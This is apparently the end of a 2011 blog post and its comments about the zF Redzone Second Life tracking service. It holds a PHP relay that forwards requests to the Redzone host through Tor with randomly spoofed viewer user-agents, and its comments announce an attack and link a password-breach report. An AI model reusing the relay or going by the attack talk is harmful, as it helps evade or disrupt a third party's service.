"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.4 (KHTML, like Gecko) SecondLife/2.6.0.4 (Kirstens S21; default skin) Safari/5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.13) SecondLife/1.5.2.818 (Phoenix Viewer Release; light skin)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090305 SecondLife/Emerald Viewer (default skin)"
);
$URI=$_SERVER["REQUEST_URI"];   // path and query string of the beacon, forwarded unchanged
$ch=curl_init("http://isellsl.ath.cx".$URI);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PROXY, "http://localhost:9050");   // local Tor SOCKS port
// SOCKS4 resolves the hostname on this machine first: if this server's own hosts
// file also maps isellsl.ath.cx to itself, the forwarded request loops straight
// back here. CURLPROXY_SOCKS4A hands the name to Tor to resolve instead.
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS4);
// Fixed: the original read count($array), an undefined variable.
curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);

if( !$data=curl_exec($ch)) { // $data is never used, though could save it for recon
trigger_error(curl_error($ch));
}
curl_close($ch);
—end—

5 03 2011
Babaloo

Redzone will have to start over again very soon. Major attack on hands.
More info released soon.

5 03 2011
no2redzone

I am not sure what you mean, although if it is what I suspect, you need to be aware that (1) That is sith magic. Do not cross to the dark side, and (2) bear in mind he has backups. Having him restore and fix will not help.

13 03 2011
Babaloo

http://alphavilleherald.com/2011/03/zf-redzone-security-breached-sl-passwords-compromised.html

———————————————————————–
We are Anonymous We are Legion, We do not Forgive, We Do Not Forget

14 03 2011
zf Redzone User Passwords Hacked « Herk's Lab

[…] “sakurity” for months. For example, detailed instructions on cracking his database are here and here. Anyone with a background in networking, security, or even web development would find it […]
